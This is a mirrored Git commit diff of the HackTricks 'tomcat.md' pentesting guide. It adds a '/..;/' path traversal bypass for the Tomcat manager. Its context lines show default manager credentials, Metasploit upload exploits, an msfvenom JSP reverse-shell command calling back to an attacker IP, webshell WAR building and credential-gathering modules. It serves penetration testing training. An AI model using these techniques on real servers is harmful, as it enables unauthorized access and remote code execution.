Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#2914] No subject

Browse source
This commit is contained in:
CPol 2021-12-23 18:13:55 +00:00 committed by gitbook-bot
parent a02d06638b
commit cf2bd3062d
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 17 additions and 10 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

27
pentesting/pentesting-web/tomcat.md
View file

@ -16,11 +16,11 @@ msf> use auxiliary/scanner/http/tomcat_enum
## Default credentials
The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** \(execute code\). But this path is protected by basic HTTP auth, the most common credentials are:
The most interesting path of Tomcat is _**/manager/html**_, inside that **path you can upload and deploy war files** (execute code). But this path is protected by basic HTTP auth, the most common credentials are:
* admin:admin
* tomcat:tomcat
* admin:<NOTHING>
* admin:\<NOTHING>
* admin:s3cr3t
* tomcat:s3cr3t
* admin:tomcat
@ -49,12 +49,12 @@ A well-known vulnerability _to_ access the application manager \_\_ is mod\_jk i
In order to access to the management web of the Tomcat go to: _pathTomcat/%252E%252E/manager/html_
Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.
Take into account that to upload the webshell you might need to use the double urlencode trick and send also a cookie and/or a SSRF token.\
To access to backdoor you might also need to use the double urlencode trick.
### /examples
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting \(XSS\) injection \(from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)\).
The following example scripts that come with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross site scripting (XSS) injection (from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)).
* /examples/jsp/num/numguess.jsp
* /examples/jsp/dates/date.jsp
@ -79,13 +79,21 @@ The following example scripts that come with Apache Tomcat v4.x - v7.x and can b
* /examples/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp
### Path Traversal (..;/)
In some **vulnerable versions of Tomcat** you can access to protected directories in Tomcat using the path: `/..;/`
So, for example, you might be able to **access the Tomcat manager** page accessing: `www.vulnerable.com/lalala/..;/manager/html`
**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
## RCE
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file \(execute code\)**.
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
### Limitations
You will only be able to deploy a WAR if you have **enough privileges** \(roles: **admin**, **manager** and **manager-script**\). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` \(it vary between versions\) \(see [POST ](tomcat.md#post)section\).
You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](tomcat.md#post)section).
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
@ -114,11 +122,11 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
```
Then, upload the revshell.war file and access to it \(_/revshell/_\)
Then, upload the revshell.war file and access to it (_/revshell/_)
### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
In some scenarios this doesn't work \(for example old versions of sun\)
In some scenarios this doesn't work (for example old versions of sun)
#### Download
@ -178,7 +186,7 @@ $ jar -cvf ../webshell.war *
webshell.war is created
```
You could also install this \(allows upload, download and command execution\): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
You could also install this (allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
## POST
@ -194,4 +202,3 @@ Other ways to gather Tomcat credentials:
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
```